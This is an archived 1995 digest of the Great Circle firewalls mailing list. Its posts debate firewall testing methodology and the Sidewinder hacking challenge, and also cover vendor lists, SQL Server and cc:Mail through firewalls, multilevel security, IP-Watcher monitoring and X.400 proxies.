comes from a sound design. A firewall "designathon" in which the vendors debated why their design philosophy is better - now *that* would be interesting and useful. I've been really upset recently by a trend I'm seeing in firewalls, where unscrupulous consultants and "firewall experts" do "penetration tests" on firewalls for large amounts of money. Basically, they run SATAN against it, wave a dead chicken over it, and announce they found nothing. This is a completely bogus approach and does not benefit the customer at all. There *IS* a use for firewall installation testing/verification, but it depends on: 1) Understanding the design of the firewall 2) Understanding the installation assumptions of the firewall 3) Seeing that the implementation of the firewall matches the design. This entails developing hypotheses based on the design, as to how it might fail if the implementation was different from the specification 4) Seeing if the firewall is installed correctly on the customer's network #4 is important. I've run across one case where a firewall was installed *WRONG* so that traffic could route around it!! Someone who "tested" it using the simple approach might decide it was secure because they'd never think to set up some special routes in their test machine. The reason that the SATAN+wave-a-chicken approach is popular is because the consultant can invest minimal prep time, and doesn't have to actually learn anything about the product other than that it's a black box. Some of the big body-shop consulting firms are gearing up to become "official firewall testers" and their methodologies appear to be mostly in the SATAN+chicken mode. A connectathon will simply invite a large amount of such bogusness to happen over a short time in a small place. mjr. From firewalls-owner Wed Aug 2 09:45:10 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id IAA10276 for firewalls-outgoing; Wed, 2 Aug 1995 08:08:03 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id IAA10206 for ; Wed, 2 Aug 1995 08:07:52 -0700 Received: from beach.sctc.com(192.55.214.50) by miles via smap (V1.3) id sma010188; Wed Aug 2 08:07:04 1995 Received: from beach.sctc.com (daemon@localhost) by beach.sctc.com (8.6.12/8.6.12) with ESMTP id KAA20589 for ; Wed, 2 Aug 1995 10:09:57 -0500 Received: from spirit.sctc.com (spirit.sctc.com [172.17.192.76]) by beach.sctc.com (8.6.12/8.6.12) with ESMTP id KAA20585 for ; Wed, 2 Aug 1995 10:09:57 -0500 Received: from ender.sctc.com (ender.sctc.com [172.17.192.69]) by spirit.sctc.com (8.6.12/8.6.10) with ESMTP id KAA25640 for ; Wed, 2 Aug 1995 10:05:59 -0500 Received: (from thomsen@localhost) by ender.sctc.com (8.6.12/8.6.9) id KAA05301; Wed, 2 Aug 1995 10:05:55 -0500 Date: Wed, 2 Aug 1995 10:05:55 -0500 From: dan thomsen Message-Id: <199508021505.KAA05301@ender.sctc.com> To: firewalls@greatcircle.com Subject: Sidewinder Challenge Sender: firewalls-owner@GreatCircle.COM Precedence: bulk For the record The reward for completing the Sidewinder Challenge has not changed! Someone erroneously posted a message saying that the reward for completing the challenge at DEFCON was $5000. The reward still remains a black nylon flight jacket with the Sidewinder logo on it. In response to some of the discussion this has generated I thought I would answer a few of the concerns that have been raised. CONCERN 1. Setting up a challenge site does not provide sufficient testing, All a challenge site does is test how good the attackers are. We do NOT test the Sidewinder system by setting up a challenge site. We have a Systems test group that does systems testing. They work independently from the developers to test the functionality and security of the system. CONCERN 2. What good is the challenge, because it is not set up like a firewall. [Note, for those not familiar with the Sidewinder challenge, we let you login to the Challenge system and from there you have to get to a machine on the internal network. The DEFCON challenge is going to be more difficult and set up more like a firewall] The Secure Computing Sidewinder challenge focuses on testing the type enforcement technology, not the firewall capability. Type enforcement is what we use to protect sensitive data, applications, and network interfaces in the firewall product. Why do we focus on type enforcement? First off we want people to look at the system. If it was set up like a firewall only the successful people see inside the system. A firewall challenge is more difficult and attackers would lose interest quickly. Believe it or not we wanted to give the hackers a chance to break into the system. The standard Sidewinder firewall product was modified to produce a Sidewinder challenge system that gives the hackers three key advantages: - A login account on the firewall (demo with no password) Normally users do not have accounts on Sidewinder. - Four access violations before they are logged out On the Sidewinder firewall one violation causes a user to be logged out. - Loose Unix administration Rather than remove every piece of software on the system and tighten security so hackers have nothing to work with, we left many Unix programs on the challenge system, including a compiler. On the Sidewinder firewall programs that are not needed are removed. People can get inside the challenge system and look around. We have had approximately 10 people get 'root' access. Since type enforcement is underneath the Unix permissions it doesn't do them any good. The attacker is still constrained by the underlying type enforcement constraints. As a result we get to learn what kind of attacks people are using against Unix systems. More importantly this shows that type enforcement is a useful tool in preventing system compromises. The biggest reason to create a challenge site that is different from the Sidewinder firewall product is to protect our customers. If there ever was a successful attack found on the Sidewinder challenge site it could not be used directly on the Sidewinder firewall. The challenge site is currently based on a pre 1.0 release of Sidewinder. Currently we are shipping 2.0 systems, and upgrading all our customers to 2.0 systems. We monitor the challenge site everyday and if someone finds a vulnerability we can respond immediately by closing the vulnerability and notifying all our customers. The DEFCON firewall challenge is more difficult than the Sidewinder Challenge. While it looks more like the the Sidewinder firewall product we are only running the DEFCON challenge for a short period time, and it will be closely monitored. CONCERN 3. Is the Challenge a serious learning tool or a Marketing tactic? The answer is both. We learn about attacks on Unix operating system. People who login to the challenge site learn about type enforcement. If you are considering buying a firewall system what better way to evaluate it than to login and kick the virtual tires. Dan Thomsen Secure Computing thomsen@sctc.com From firewalls-owner Wed Aug 2 09:53:06 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id IAA11843 for firewalls-outgoing; Wed, 2 Aug 1995 08:57:11 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id IAA11819 for ; Wed, 2 Aug 1995 08:57:07 -0700 Received: from danpost.uni-c.dk(129.142.6.64) by miles via smap (V1.3) id sma011814; Wed Aug 2 08:56:44 1995 Received: from dr.dk (post.dr.dk [130.226.72.253]) by danpost.uni-c.dk (8.6.4/8.6) with SMTP id RAA27681 for ; Wed, 2 Aug 1995 17:55:35 +0200 Received: from smtpgw.dr.dk by dr.dk with smtp (Smail3.1.29.0 #1) id m0sdgFM-0003nHC; Wed, 2 Aug 95 18:02 MET DST Received: by smtpgw.dr.dk with Microsoft Mail id <30201EF7@smtpgw.dr.dk>; Wed, 02 Aug 95 17:57:27 PDT From: S?ren D?ssing DR-EDB To: "'firewalls@greatcircle.com'" Subject: HP9000 firewalls Date: Wed, 02 Aug 95 17:55:00 PDT Message-ID: <30201EF7@smtpgw.dr.dk> Encoding: 18 TEXT X-Mailer: Microsoft Mail V3.0 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk As I promised, here are a resume of firewalls for HP9000 computers. TIS Firewall Toolkit Trusted Information Systems http://www.tis.com HP-UX Gauntlet Trusted Information Systems http://www.tis.com Eagle Raptor http://www.raptor.com/ Firewall-1 Checkpoint http://www.checkpoint.com From firewalls-owner Wed Aug 2 10:26:52 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id IAA10537 for firewalls-outgoing; Wed, 2 Aug 1995 08:16:57 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id IAA10527 for ; Wed, 2 Aug 1995 08:16:55 -0700 Received: from di.disclosure.com(205.156.194.1) by miles via smap (V1.3) id sma010525; Wed Aug 2 08:16:49 1995 Received: by Disclosure.COM (4.1/SMI-4.1) id AA21011; Wed, 2 Aug 95 11:18:26 EDT Date: Wed, 2 Aug 1995 11:18:25 -0400 (EDT) From: Scott Barman To: Phil Trubey Cc: firewalls@greatcircle.com Subject: Re: Microsoft SQL Server on NT through firewall? In-Reply-To: Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Tue, 1 Aug 1995, Phil Trubey wrote: > I know there has been some discussion here about Oracle's SQL*Net and how > one would go about providing access to such a server through a firewall. > > Does anyone know if this is possible with Microsoft's SQL Server running on > an NT machine? The Internet based client application will be using either > dblib or ODBC calls to the network layer to access a server which will be > on the protected side of the firewall. > > Does anyone know if MS SQL Server uses a static TCP port number for its > server? Is any data including passwords encrypted? And since M$'s SQL server is based on Sybase's (keeping with the theme), does anyone know how to tunnel these through a firewall? I just found out (last night) that I may have to do this so I am interested in any and all information! THANKS! scott barman -- scott barman DISCLAIMER: I speak to anyone who will listen, scott@disclosure.com and I speak only for myself. barman@ix.netcom.com "Micro$oft and Windoze/NT will be the cause of the de-evolution of network security just as the original PC and BASIC was the cause of the de-evolution of programming." From firewalls-owner Wed Aug 2 10:32:28 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id IAA10688 for firewalls-outgoing; Wed, 2 Aug 1995 08:21:00 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id IAA10658 for ; Wed, 2 Aug 1995 08:20:55 -0700 Received: from gmap15.leeds.ac.uk(129.11.84.200) by miles via smap (V1.3) id sma010609; Wed Aug 2 08:19:52 1995 Received: from gmap3 (gmap-mailhub.leeds.ac.uk [129.11.200.3]) by gmap-gw.leeds.ac.uk (8.6.12/8.6.9) with ESMTP id QAA06394 for ; Wed, 2 Aug 1995 16:14:16 +0100 Received: from gmap.leeds.ac.uk (gmap124 [129.11.200.124]) by gmap3 (8.6.12/8.6.9) with SMTP id QAA29437 for ; Wed, 2 Aug 1995 16:18:34 +0100 From: Danny Cox Date: Wed, 2 Aug 1995 16:15:49 +0100 Message-Id: <3168.9508021515@gmap.leeds.ac.uk> To: firewalls@greatcircle.com Subject: an alternative for our email X-Sun-Charset: US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Dear all, we have our email working nicely currently, coming in and out. I still need to setup smapd or some such to wrap around sendmail however, but that's another story. A complication in our particular setup is the existance of a fair sized network of PCs, which run Netware (3.1 I think) and WfWg. The mailtool used on those is cc:Mail. What I was hoping to achieve was to use the cc:Mail to view the mail which would be stored on a Solaris mail server somewhere. The mail is already setup for the Sun network just fine. Seemingly cc:Mail doesn't talk SMTP directly; we need a gateway of some sort. That's doesn't feel brilliant to me, as it seems that we'd end up with mail files distributed in different places, and have more than one email address per user (I think?). Another option is to run Solaris cc:Mail and have that connecting to the cc:Mail post office, and then the cc:Mail/SMTP gateway connecting to the outside world. I have mixed feelings about this; all this is behind a firewall, and I have a nasty feeling I could end up out of control somewhere. Anyone any experience of doing this sort of thing, or got any comments ? ______________ internet _________________ | ---------------- |firewall | ---------------- | ---------------- ---------------------- | cc:Mail |----------|cc:Mail Post Office | | SMTP gateway | ---------------------- ---------------- | | (cc:Mail clients) PCs Suns thanks in advance Danny From firewalls-owner Wed Aug 2 10:53:09 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id IAA11810 for firewalls-outgoing; Wed, 2 Aug 1995 08:56:16 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id IAA11737 for ; Wed, 2 Aug 1995 08:56:05 -0700 Received: from uvs1.orl.mmc.com(141.240.192.10) by miles via smap (V1.3) id sma011718; Wed Aug 2 08:55:24 1995 Received: from TCCSLR.DECnet MAIL11D_V3 by uvs1.orl.mmc.com (5.57/Ultrix3.0-C) id AA17110; Wed, 2 Aug 95 11:37:22 -0400 Date: Wed, 2 Aug 95 11:37:22 -0400 Message-Id: <9508021537.AA17110@uvs1.orl.mmc.com> From: padgett@tccslr.dnet.mmc.com (A. Padgett Peterson, P.E. Information Security) To: "firewalls@greatcircle.com"@UVS1.dnet.mmc.com Subject: Re: Using multilevel systems... Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Ted rites: >Now we're all "Thrivng On Chaos", driving information down to the user's >desktop. Heck, I'm writing this using Linux. Forget Windows 95, I get this >for *free*. Remember the old saying: "Old VAXes never die, they just get >clustered"? The new one is "Old 486s never die, they just become bitchin >workstations with Linux/GNU/X/MUDs/etc." All this means is that we need distributed systems. Things which we make available to the public need to be separated from that which is to be kept private. A or B. Not difficult at all. >Management understanding of these issues is way behind. The obvious problem >is Phyber Optik hacking in from the `net and looking thru the Personnel >files. The less obvious problem is insuring the integrity (much less often, >the privacy) of corporate data, from all threats. I think most managaement understanded that there is a problem. The bigger issue is that many managers feel that they know what to do about it. Think it was Will Rogers that said "Isn't what people don't know that is the problem, It's what they know that just isn't so." Managers, particularly middle managers in big corporations, seem to feel that to admit there is something they do not know, is unadmissable. Even worse are experts (LAN experts in particular) operating out of their field. Curiously, top management, if you can ever get through to them, are usually not a problem - guess they do not feel threatened. >Note that hackers should fall into one of these categories, and firewalls >only protect against a certain, very well bounded class of these risks. >(a quick note: the mainframe guys DO think about this; it's the UNIX/DOS >world that doesn't.) Just finished reviewing an audit document that made much of "viruses" and "virus scanning". Popular buzzwords and an indication that the writer really does not understand the bigger problem. Is an indication that this is widespread that scanners are still so popular. My software hasn't a clue what a virus is but addresses the larger problem of viruses and worms and trojans and logic bombs. Once it is installed, most people never even know it is there unless something goes rong. Of course that is my concept of good security - you never need to know it is there unless something happens. >I think that maybe the issue shouldn't be phrased as "Bad old Management >doesn't understand Internet Security and Firewalls" (they don't; get over >it). Rather, we need to start learning corporate-speak concerning data >integrity issues. Once this happens, we'll probably see some pretty >decent progress. Have taken graduate level courses in finance for that reason. Problem has always been middle management, not top, and being able to talk intelligently about furture values and sunk costs does not help there. Seems you must get though the "glass ceiling" first and engineers just do not do that. Warmly, Padgett From firewalls-owner Wed Aug 2 11:04:08 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id IAA10604 for firewalls-outgoing; Wed, 2 Aug 1995 08:19:02 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id IAA10560 for ; Wed, 2 Aug 1995 08:18:55 -0700 Received: from uvs1.orl.mmc.com(141.240.192.10) by miles via smap (V1.3) id sma010538; Wed Aug 2 08:17:53 1995 Received: from TCCSLR.DECnet MAIL11D_V3 by uvs1.orl.mmc.com (5.57/Ultrix3.0-C) id AA16948; Wed, 2 Aug 95 10:39:32 -0400 Date: Wed, 2 Aug 95 10:39:31 -0400 Message-Id: <9508021439.AA16948@uvs1.orl.mmc.com> From: padgett@tccslr.dnet.mmc.com (A. Padgett Peterson, P.E. Information Security) To: "firewalls@greatcircle.com"@UVS1.dnet.mmc.com Subject: re: multilevel etc. (curse branedead VaxMail) Sender: firewalls-owner@GreatCircle.COM Precedence: bulk JGT rites (and >> Ray): >I can't even think about it. It is tough enough getting everyone >to setup and run their DNS and email configurations correctly. >Multi-level network??? The cost of setting it up, let alone >maintaining it, let alone getting management to buy into it >is inconceiveable. Not at all difficult when you remove the classical "single CISC O/S based host does everything" for an array of single purpose dumb machines. Divide and conquer. >> This is indeed the classical view of distributed system security: >> 1) All data is important to some degree or another >> 2) All data should be separated from all other data >> to some degree or another >> 3) Most organizations don't separate their data at all >> Conclusion: therefore they are wrong >> Corollary: therefore they should use multilevel systems Here is where I was making the separation between "bilevel" and "multilevel" systems: bilevel is essentially "system high" - all people/nodes/processes within the group have the same access level and all information is treated equally. Why get hung up on multiple levels of protection within a single entity when you can just separate the differing levels ? Came to the conclusion a looong time ago that it is easier to protect *everything* than just some things. Also makes management decisions easier (long about 1989 we had a policy that mandated protection of "Critical Electronic Information" - as typical in my career, the most valuable contribution I made was to remove the word "Critical"). >Conclusion: Most organizations accept the risk of data compromise > or destruction as an acceptable cost. A cost that is > far below the cost of implementing the 'correct' > protections. Only organization that can say that is one that does not have much to lose. There are several multimillion dollar programs (multi-hundred-million dollar programs !) that I strongly suspect (don't ask) were lost due to electronic bidding leaks. > "Meeting the spec" is the real reason multilevel systems won't > take off. It's too late. Security does not have to be difficult provided is on choke points. Individual nodes/workstations are not choke points. Take my lawn sprinklers (please 8*): I do not have a valve on each head, I have distribution valves at a single point that control the flow to each subsection. Control is via a $5 K-mart appliance timers (4). Now for a whole lot more money/complexity I could have purchased a single valve/ multi-point timer and would have to replace the whole thing if something goes rong (have spent about $40 in maintenance over ten years. SDPS model was three times that). True, the lower cost was offset by somewhat more planning/work to install up front but is much simpler and not having microprocessors survives here in the "lightening capital of the USA". >I think you are overstating the case. It may be there are more DOS or >Apple Macs out there that haven't a clue, but you must also consider that >all those users of those machines are also very likely to have an account >on a unix, vm, mvs or other system that does have the concept. You are >correct that integrating those 'D' systems into more secure systems is >a daunting task. Not at all difficult for "system high". >Yup. Security comes in 3rd or 4th after function, performance, and >other 'more important' issues. Have demonstrated that good security can *improve* performance by eliminating spurrious packets and reducing non-productive efforts. >Amen! It is a people EDUCATION problem. Until the people involved >understand the risks, real or imagined, to the current process and the >bottom line monetary cost and benifit NOTHING is going to happen. >Even when they do understand, a decsion may be made to do the 'wrong' >thing. Really it is a *management* education decision that they need to hire/develop some individual to "protect the Enterprise", give him/her/it/other the authority/funding to do so, and let it happen. Too often things go rong because unqualified people make idiotic decisions. Even worse, people who know better accept them. Of course the late recession make it difficult for good people to Vote With Their Feet. Point is that electronic security is a complex and dynamic field. To be implimented properly requires an expert in a narrow field. Keeping up is a full time job in itself. Managers are hired to manage, not to be security experts. The sooner they realize that, the better. Warmly, Padgett From firewalls-owner Wed Aug 2 11:12:08 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id KAA15227 for firewalls-outgoing; Wed, 2 Aug 1995 10:11:58 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id KAA15212 for ; Wed, 2 Aug 1995 10:11:55 -0700 Received: from fw1.nda.com(204.57.47.254) by miles via smap (V1.3) id sma015206; Wed Aug 2 10:11:40 1995 Received: (kovar@localhost) by nda.nda.com (8.6.11/8.6.4) id NAA29962 for firewalls@greatcircle.com; Wed, 2 Aug 1995 13:10:29 -0400 From: David Kovar Message-Id: <199508021710.NAA29962@nda.nda.com> Subject: Firewall testing lab? To: firewalls@greatcircle.com Date: Wed, 2 Aug 1995 13:10:29 -0400 (EDT) In-Reply-To: <9508021450.AA05935@tis.com> from "Marcus J Ranum" at Aug 2, 95 10:50:15 am X-Mailer: ELM [version 2.4 PL20] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Content-Length: 1368 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk This discussion about a connect-a-thon reawakened my interest in a project I've been meaning to put together for awhile, a true firewall testing lab. This would essentially duplicate what Scott Bradnor at Harvard did for routers a few years back. Off the top of my head, it would require: * A test suite would be developed for use with all systems. * A common hardware platform would be chosen. * A fixed network would be constructed, consisting of several "internal" hosts running common, and not so common, services along with several external machines. * A checklist would be developed for reporting the performance and service characteristics in a uniform fashion. * A summary report. I'd envision one massive test to cover the existing products and then quarterly reviews and new tests to cover updates and new products. What I lack, at the moment, is the hardware and the space to house the test lab. I suspect I can secure the hardware without too much difficulty. Anyone in the SF Bay area have any space they can contribute to this effort? If anyone is seriously intersted in contributing to such a project, please let me know. I think it would be beneficial to the firewall community if done properly. "Done properly" is crucial. Level playing field, no (or few) egos and self serving efforts, and as unbiased as possible. -David From firewalls-owner Wed Aug 2 11:39:56 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id LAA18645 for firewalls-outgoing; Wed, 2 Aug 1995 11:28:35 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id LAA18614 for ; Wed, 2 Aug 1995 11:28:29 -0700 Received: from mercury.sun.com(192.9.25.1) by miles via smap (V1.3) id sma018606; Wed Aug 2 11:28:05 1995 Received: from Eng.Sun.COM by mercury.Sun.COM (Sun.COM) id LAA16281; Wed, 2 Aug 1995 11:24:50 -0700 Received: from olympics.Eng.Sun.COM by Eng.Sun.COM (5.x/SMI-5.3) id AA24071; Wed, 2 Aug 1995 11:24:44 -0700 Received: by olympics.Eng.Sun.COM (5.1 03/21/95 /CRAY-5.1) id AA15663; Wed, 2 Aug 95 11:19:35 PDT Date: Wed, 2 Aug 95 11:19:35 PDT From: Brad.Powell@Eng.Sun.COM ( Brad Powell SunNetworks) Message-Id: <9508021819.AA15663@olympics.Eng.Sun.COM> To: craiga@Ipsilon.COM Subject: FireWall Connectathon Cc: firewalls@GreatCircle.COM Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Craig, I'd add a rule of the form: Configuration *must* be in use/production somewhere. It would be too easy to build a host that didn't do much of anything, and didn't pass squat, and thus didn't show any holes. I commend the effort, but would want this to be a realistic testing of *real* firewalls. Otherwise we end up with 10 vendors with air-tight configs that wouldn't be useful as anything except boat anchors. my U.S. $0.02 Brad From firewalls-owner Wed Aug 2 12:05:21 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id LAA18928 for firewalls-outgoing; Wed, 2 Aug 1995 11:34:40 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id LAA18876 for ; Wed, 2 Aug 1995 11:34:31 -0700 Received: from uuneo.neosoft.com(198.64.84.252) by miles via smap (V1.3) id sma018864; Wed Aug 2 11:34:25 1995 Received: from ris1.UUCP (ficc@localhost) by uuneo.neosoft.com (8.6.10/8.6.10) with UUCP id NAA09602 for GreatCircle.COM!firewalls; Wed, 2 Aug 1995 13:22:15 -0500 Received: by ris1.nmti.com (smail2.5) id AA27533; 2 Aug 95 11:53:26 CDT (Wed) Received: by sonic.nmti.com; id AA09752; Wed, 2 Aug 1995 12:18:10 -0500 From: peter@nmti.com (Peter da Silva) Message-Id: <9508021718.AA09752@sonic.nmti.com.nmti.com> Subject: Re: connectathon: BOGUS // testing methodologies To: mjr@iwi.com (Marcus J Ranum) Date: Wed, 2 Aug 1995 12:18:10 -0500 (CDT) Cc: firewalls@GreatCircle.COM In-Reply-To: <9508021450.AA05935@tis.com> from "Marcus J Ranum" at Aug 2, 95 10:50:15 am X-Mailer: ELM [version 2.4 PL23] Content-Type: text Content-Length: 400 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > In the case of NFS, connectivity and interoperability are the > main concern, so it makes sense. In a firewall, we pretty much can assume > that they'll talk to eachother (somehow) -- the question is one of security. I've run into cases where our firewall has prevented us from getting through their firewall. Mostly along the lines of "how do I tell the ftp proxy to select a different port"... From firewalls-owner Wed Aug 2 12:06:03 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id KAA15378 for firewalls-outgoing; Wed, 2 Aug 1995 10:18:58 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id KAA15370; Wed, 2 Aug 1995 10:18:55 -0700 Received: from smtpgate.gannett.com(192.234.103.2) by miles via smap (V1.3) id sma015368; Wed Aug 2 10:18:03 1995 Received: from msgate.gannett.com by smtpgate.gannett.com with smtp (Smail3.1.29.1 #1) id m0sdhJ3-0000GiC; Wed, 2 Aug 95 13:10 EDT Received: by msgate.gannett.com with Microsoft Mail id <301FDD22@msgate.gannett.com>; Wed, 02 Aug 95 13:16:34 PDT From: "Robertson, Paul" To: firewalls@greatcircle.com, firewalls-owner@GreatCircle.COM Subject: differences in perspective - Re: Someone Date: Wed, 02 Aug 95 13:16:00 PDT Message-ID: <301FDD22@msgate.gannett.com> Encoding: 41 TEXT X-Mailer: Microsoft Mail V3.0 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >From: Doug Hughes >Q: Should you notify the postmaster at a remote site? >A: it depends on circumstances > 1) is it an educational institution? - probably yes Depends on the admin at the institution. I've heard horror stories about one university that after hearing their root passwords were on a provider, said "Oh well, stuff happens". By contrast, I've been very pleased with the .edu sites I've had to contact. > 2) is it an independent service provider like netcom? - probably yes > 3) is it a major corporation? - possibly yes I'd change this to definately yes. I know *I'd* want to know if one of my users was playing around, because if he/she/it's doing it to you, they could be doing it to me too. > 4) #3 with attack coming from multiple machines? - possibly no Hmmm, this seems like time to call in the higher zone contacts. > 5) overseas? - probably no, but possibly yes I've had good results with overseas, I think a good admin is a good admin, regardless of geography. > 6) a known "den of thieves" hack site? - definitely no Unless you think that they will go bother someone else, and your audit requirements make that a good thing. > etc.. Paul. -- Paul D. Robertson "The opinions stated above may have no proberts@moc1.gannett.com basis whatsoever in reality." PSB#9280 From firewalls-owner Wed Aug 2 12:07:30 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id JAA13978 for firewalls-outgoing; Wed, 2 Aug 1995 09:37:52 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id JAA13929 for ; Wed, 2 Aug 1995 09:37:44 -0700 Received: from dialin-46.wustl.edu(128.252.112.46) by miles via smap (V1.3) id sma013918; Wed Aug 2 09:37:18 1995 Received: (from mcn@localhost) by guardian.EnGarde.com (8.6.12/8.6.9) id LAA14245; Wed, 2 Aug 1995 11:34:15 -0500 Date: Wed, 2 Aug 1995 11:34:15 -0500 From: Mike Neuman Message-Id: <199508021634.LAA14245@guardian.EnGarde.com> To: avalon@coombs.anu.edu.au, firewalls@greatcircle.com Subject: Re: IPWatcher Reply-To: mcn@EnGarde.com Newsgroups: egs.firewalls In-Reply-To: <199508021154.EAA02220@miles.greatcircle.com> Organization: En Garde Systems--St. Louis, MO Sender: firewalls-owner@GreatCircle.COM Precedence: bulk In article <199508021154.EAA02220@miles.greatcircle.com> you write: >IP watcher is nice and fine but it assumes you're going to be there 24hours >a day to catch the cracker that comes knocking at 2am. I'd prefer to be >asleep with some knowledge that my network was safe than be thinking on >whether or not I should be there watching, waiting... Well, IP-Watcher never claimed to be the all-encompassing network security solution. Sound network security should be built of multiple components, working together. IP-Watcher should be just one of those components (a sound firewall should be another, and a sound network security scanner yet another). IP-Watcher was designed to respond to situations where a hacker gets past your other layers of security, and you need a way to: 1) Log, for evidence purposes, his actions 2) Determine what holes he is exploiting 3) Determine what machines he has exploited so you can direct your cleanup efforts, and get an idea of how much damage has been done 4) Monitor a suspicious user in realtime, and be able to terminate that user's connection in realtime. Or, what about monitoring insiders? They're already past your firewall, and could be attacking machines from the inside. IP-Watcher can help defend against that threat as well. And, of course, there are many non-security uses for IP-Watcher as well... Although many firewall vendors will claim they have the be-all end-all solution to network security, and that by putting their system in place, you can sleep easy at night and never worry about a hacker, never is that truly the case. Personally, I'd prefer to worry about whether I should be watching my network, rather than closing my eyes to the possibility. (But then again, I'm one of the authors of the program. :-) ) >I'm more concerned that businesses will buy these and turn them inwards... >(for better or worse). Seems like a nice tool for CERT like people who want >to watch things going on - it won't make a network more secure. On the contrary, I think it will. Giving the administrator the power to monitor anyone, and instantly terminate their connection (and even set up filter lists to lock out the remote host/network temporarily) boosts security quite a bit. Again, it's just one piece of a bigger puzzle. -Mike mcn@EnGarde.com From firewalls-owner Wed Aug 2 12:39:16 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id KAA16556 for firewalls-outgoing; Wed, 2 Aug 1995 10:47:10 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id KAA16519 for ; Wed, 2 Aug 1995 10:47:02 -0700 From: Atkinson-K@smtpgw.nctsw.navy.mil Received: from ns.nctsw.navy.mil(138.145.16.3) by miles via smap (V1.3) id sma016501; Wed Aug 2 10:46:29 1995 Received: from smtpgw.nctsw.navy.mil by ns.nctsw.navy.mil (5.0/SMI-SVR4) id AA01862; Wed, 2 Aug 1995 13:42:16 +0500 Received: from ccMail by smtpgw.nctsw.navy.mil (IMA Internet Exchange 1.04b) id 01fb8c30; Wed, 2 Aug 95 13:41:23 -0400 Mime-Version: 1.0 Date: Wed, 2 Aug 1995 13:45:58 -0400 Message-Id: <01fb8c30@smtpgw.nctsw.navy.mil> Subject: Protecting X.400 anyone? To: firewalls@GreatCircle.com Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Content-Description: cc:Mail note part content-length: 1530 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk wbunting@ch.inri.com (Bill Bunting) wrote: >Can anyone answer some/all of the following about X.400 in a firewalled >environment. >* What are the best methods to protect X.400 and X.500? >* What is the best source of information on the WWW about X.400/X.500 and >how it relates to firewalls? >* Do you use a proxy for X.400, something like SMAP, or what? >* What is the comms flow for X.400 using TCP/IP i.e. ports in use and >protocol information? (where is this best documented [RFC ####, >http:####] ? >* Is there any freeware or public domain source code available to protect >X.400/X.500? >* Does anyone have any experience they would like to share about >X.400/X.500? >* If I should have to develop and X.400 proxy/protector which public >domain implementation of X.400/X.500 (source code) is available/best? >Thank you, >- -Bill. We've worked the issue of permitting X.500 access from a high net to a low net under the NSA MISSI program but haven't dealt with the X.400 issues. If your client is in the U.S. DoD, the firewall must be DMS-compliant, which is more than just passing X.400/X.500. I've heard that a couple of vendors are pursuing DMS-compliance, but their efforts have been hampered by delays in the award of the DMS contract. Now that we're finding out what Loral will be providing for the DMS infrastructure (MTS/DS), vendors will have a better idea of what it will take to make their product DMS/MISSI-compliant. Kenny Atkinson NCTS Washington From firewalls-owner Wed Aug 2 13:00:25 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id MAA21545 for firewalls-outgoing; Wed, 2 Aug 1995 12:48:56 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id MAA21529 for ; Wed, 2 Aug 1995 12:48:53 -0700 Received: from birch.ims.disa.mil(164.117.176.1) by miles via smap (V1.3) id sma021523; Wed Aug 2 12:48:19 1995 Received: from CC.IMS.DISA.MIL (ncr.disa.mil [164.117.176.105]) by birch.ims.disa.mil (8.6.12/DISA 0.5.3) with SMTP id PAA26982 for ; Wed, 2 Aug 1995 15:47:14 -0400 Received: from cc:Mail by CC.IMS.DISA.MIL id AA807396448; Wed, 02 Aug 95 13:35:05 EST Date: Wed, 02 Aug 95 13:35:05 EST From: "Tu Nguyen" Message-Id: <9507028073.AA807396448@CC.IMS.DISA.MIL> To: firewalls@GreatCircle.COM Subject: SW for FW Performance Test? Sender: firewalls-owner@GreatCircle.COM Precedence: bulk To all, I would like to do the following FW performance tests: 1. Load (Large sizes and large number of sessions) 2. Endurance (Large loads for long duration of time) Does anyone know where I can find software to generate traffic for the tests above. Thank you, Tu Nguyen DISA From firewalls-owner Wed Aug 2 13:32:43 1995 Received: (majordom@localhost) by miles.greatcircle.com 